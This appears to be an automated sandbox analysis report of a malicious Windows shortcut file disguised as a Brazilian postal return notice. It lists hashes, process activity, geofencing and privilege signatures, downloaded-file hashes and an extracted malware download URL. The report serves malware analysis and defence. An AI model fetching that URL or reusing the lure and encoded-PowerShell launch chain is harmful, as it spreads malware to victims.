Analysis
max time kernel: 91s
max time network: 95s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
submitted: 03-06-2024 12:00
Static task: static1
Behavioral task: behavioral1
  Sample: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
  Resource: win10v2004-20240426-en
General
Target: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
Size: 3KB
MD5: 246e74b6fffb9d5994f7f70bb6509b45
SHA1: 4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256: 0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512: 178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow  pid   Process
9     4196  powershell.exe
13    4196  powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation
Process: cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid   Process
4196  powershell.exe
4196  powershell.exe
4196  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description: Token: SeDebugPrivilege
pid: 4196
Process: powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description                         pid   Process         procid_target
PID 3660 wrote to memory of 4196    3660  cmd.exe         83
PID 3660 wrote to memory of 4196    3660  cmd.exe         83
PID 4196 wrote to memory of 3520    4196  powershell.exe  84
PID 4196 wrote to memory of 3520    4196  powershell.exe  84
PID 3520 wrote to memory of 640     3520  csc.exe         86
PID 3520 wrote to memory of 640     3520  csc.exe         86
Processes
-
C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3660
  C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4196
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline"
      - Suspicious use of WriteProcessMemory
      PID: 3520
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES441D.tmp" "c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP"
        PID: 640
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 1KB
MD5: 7e5f8cdf1324510f437f6461b8010bf1
SHA1: 33d6765989cbbf97b7f3d301682e66f5e0d4ab7a
SHA256: 2706269ca0ab90bcb74a8d4835c15ca3b06c1043db8dee5b7defc346e16e2963
SHA512: 815b34a68398fcc9362f791282334f01470a1a0f11c3703fc7eba7e9b33a629dc57957fdeb61c156021006a59e0a165b78ff013220885c374b1ef0bdfc90d6ed
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 3KB
MD5: b56d5aa15b56741250e165d33432c9f2
SHA1: 9e5d7f53ec98180eb82a953615f0bf07565c15de
SHA256: e29f26e8cc27ebcb82fcc3915cc148c71b9914ce88da803dba46a07f2e66d1ab
SHA512: 496e57b2cb18bcf4eddf62b7aa27032da6735273384d0eb94738ff63d9ac3c8eb173a80e0c903074dd9fd9fa027ebeb0ab7e93ff6c0c9616672a4a3b83e01c32
-
Filesize: 652B
MD5: a764751e67b4933e8bfa8cf660ec502a
SHA1: b52b846b0c1ce2d1a0d60c0204c43d50838f0a5f
SHA256: 5b380f4c658006d672b43031fe31dece71b4c1e3c3bd3496a69ee4d0b6afe2bc
SHA512: ea0a1467e0023e7f7fbd6dad801b2b8242122cfdf4642c81871e74a8588c26d263036fb778e78c51bc6814d451d895f12583c83a471e214eb8a63928335c28b1
-
Filesize: 187B
MD5: 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1: cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256: 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512: 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize: 369B
MD5: b13936f927e1044e6fbcfae343fb55eb
SHA1: 1772c6ab3ae7797e3db26377e0481af84817efa8
SHA256: 654fb4421435548594bbfa6efa730ad4d02d9044297f2fe2e6df5f57e3bf9c30
SHA512: 1eb3af8b657deb7d43b657ce3a963ba272d7789e2f09e1c3c1a9ac97874da369bd0106719d1744d79acb356c1721fd7920504010b40c2eaf98f0cc1b08d3eb7a